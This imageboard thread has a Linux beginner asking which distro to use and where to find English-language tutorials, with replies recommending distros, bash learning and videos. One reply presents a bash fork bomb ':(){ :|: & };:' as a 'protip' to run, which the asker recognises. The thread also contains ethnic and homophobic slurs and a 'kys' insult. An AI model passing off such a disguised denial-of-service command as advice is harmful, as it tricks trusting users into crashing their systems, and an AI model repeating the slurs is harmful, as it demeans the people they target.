Getting started with Linux, I love it so far and the installgentoo wiki has actually been really helpful. Few things:

Getting started with Linux, I love it so far and the installgentoo wiki has actually been really helpful. Few things:
1) After trying a few different distros I landed on Linux Mint 19 Cinnamon. It's alright but I was wondering if there's a better distro for a beginner to learn the in's and out's.
2) I've been going through a lot of tutorials, obviously. Though most of the video guides I find are from pajeets and I can barely understand their thick accents. Any good youtube channels run by people whose mother tongue is English?

Attached: linux-mint-logo-png-transparent.png (2400x2156, 351K)

Other urls found in this thread:

youtube.com/watch?v=HIXzJ3Rz9po
youtube.com/watch?v=eH8Z9zeywq0
youtu.be/oxuRxtrO2Ag
youtu.be/hwrnmQumtPw
youtu.be/eH8Z9zeywq0
youtu.be/wBp0Rb-ZJak
easylinuxtipsproject.blogspot.com/p/1.html
twitter.com/SFWRedditGifs

Linux mint is shit. Use Debian.

check out Luke Smith's channel. Also install Arch Linux. you can thank me later.

>It's alright but I was wondering if there's a better distro for a beginner to learn the in's and out's.
No, don't fall for the "distro hopper" meme. It's bullshit, stick with a solid distro that is supported and keep with it. You'll learn quickly enough, its important that you use something that works for you as a daily driver. Mint should be just fine.

Try Manjaro KDE. Seriously, it's great for all kinds of users, gives you the power of Arch and usually everything works out of the box.

I don't understand.

what is there to learn about linux?

>super easy installation
>package manager/software center is all you need for installation of software

I really don't understand why people need tutorials for linux.

Linux Mint is a great distro, been using it since I started with Ubuntu, and its a great transition from windows. Most stuff justwerks and you can rice it how you like with mint spices.
You really don't have to keep distrohopping if you have found one that you are comfortable with, you will learn more of its features as time goes on.
As for youtube channels, check out Hak5, they have a lot of videos on linux and the terminal, but I cant seem to find the playlist...

If you're new to linux and want to learn more, I 9001% recommend learning how to use a bash terminal and learn how to write and run bash scripts for automation. Learning how the file system works is a good idea too.

youtube.com/watch?v=HIXzJ3Rz9po (Linux file structure)
youtube.com/watch?v=eH8Z9zeywq0 (Bash terminal - folow the series)

what in the fuck does my response () have to do with tutorials?

Stick with what you have, atleast for now. Linux Mint is a solid distro that just works. Don’t distrohop, it’s just a waste of time, and you won’t really find anything much better.

>Mint
install Arch FAGGOT

sorry to ask, what would you automate?

OP here, thanks so much for the info based anons. I don't really aim to distro hop and mint is pretty comfy, but I'd like to be open to other distros especially once I get my bearings. It isn't that it's all that difficult, just kinda polarizing for a lifetime Windows user is all. Moreso I'd want to explore other distros for lightweight persistent usb's and that. Is there a Jow Forums approved portable persistent distro or does it just depend on what I want from it?

updates, backups, log checking, system cleaning, etc. Its not 100% necessary but its fun to tinker.

From what I've read, isn't Arch specifically counter-intuitive for linux beginners? Or are you telling me to just say fuck it and dive into the deep end?

>what would you automate
backups, daily/monthly/weekly/yearly tasks like P&L statements, there is no end to automation -- what an odd question.

he's just getting you to dive in neck deep.. use a GUI friendly distribution until you feel like taking a deep dive. learn bash before you go into arch or the like.

i would recommend Solus

sounds like a plan thanks user
Yea I actually just grabbed an iso for that was gonna try out a live usb later today. Looking for something super light to use as a persistent usb, was looking at solus and clear linux.

I use timeshift and dejadup to do automated backups

automatic updates on linux? risky

use manjaro

manjaro is basically a safer and easier version of arch, also more popular.

arch is for elite neckbeards who like to break their system and then fix it again.
not for productive people.

>better distro
Linux Mint Xfce.

>risky
It isn't unless you're doing a full version upgrade. I've had auto-updates enabled since 19 was released and even use ukuu to fetch the latest kernel automatically every week. So far no issues whatsoever.

I don't know about video tutorials, but there is plenty of text stuff. Learn basic shell commands and stuff like dmesg for troubleshooting

I'll give it a try today thanks
Yea learning shell commands is kinda where I'm at since I just started. I haven't really been able to find a wiki for quickly looking up shell stuff as I go along, if you know of one a link would be radical.

Linux Mint and Ubuntu are about as noob friendly as you'll get for Linux while still being respectable choices for veteran users. As you familiarize with the environment you may find yourself wanting more control and modularity over your distro, in which case skip the memes and install Gentoo. Then you get to really build your system from the ground up and dickwave on Jow Forums

try apropos "search key" without the doublequotes.
I recommend walking through a tutorialspoint tutorial for bash or something. always remember that you have autocompletion on hitting tab and if you don't know what a command is for, you can read the manual with man "command" (this, too without the quotation marks)

>skip the memes and install Gentoo.
b-but isn't 'install gentoo' the Jow Forums meme?

kys luke

Gentoo is:
>not as difficult to install as you might think
>a great learning experience for noobs
>a very versatile and stable OS
I am kinda okay with it having a meme status, but it is indeed a pretty good OS if you understand the underlying concepts

HOLY CRAP see this is the kinda thing, I never knew about apropos thanks dude. Yea seems I definitely need a tutorial walk through

protip:
run this command in terminal for the real Jow Forumsentooman experience:
:(){ :|: & };:

Kek wills you to try it

Attached: f52541-08__22344.1504256086.jpg (600x600, 11K)

I'll check it out then, thanks
no thankyou but thanks for teaching me what a fork bomb is.

Attached: eosuZ9w.jpg (398x500, 34K)

Just make sure to know what hardware you are installing on and don't compile the graphics modules as built-ins and you'll be fine. If you ever installed GUI-less you should be good to go. The Gentoo installtion tutorial is pretty solid

op here, Jow Forums gets a bad rep but you guys have been incredibly helpful, thanks.
I promise I won't tell anyone.

terminal in english
youtu.be/oxuRxtrO2Ag

youtu.be/hwrnmQumtPw

youtu.be/eH8Z9zeywq0

youtu.be/wBp0Rb-ZJak

Here, this includes many useful tips for newcomers.
easylinuxtipsproject.blogspot.com/p/1.html

Attached: 1550881756060.jpg (500x333, 38K)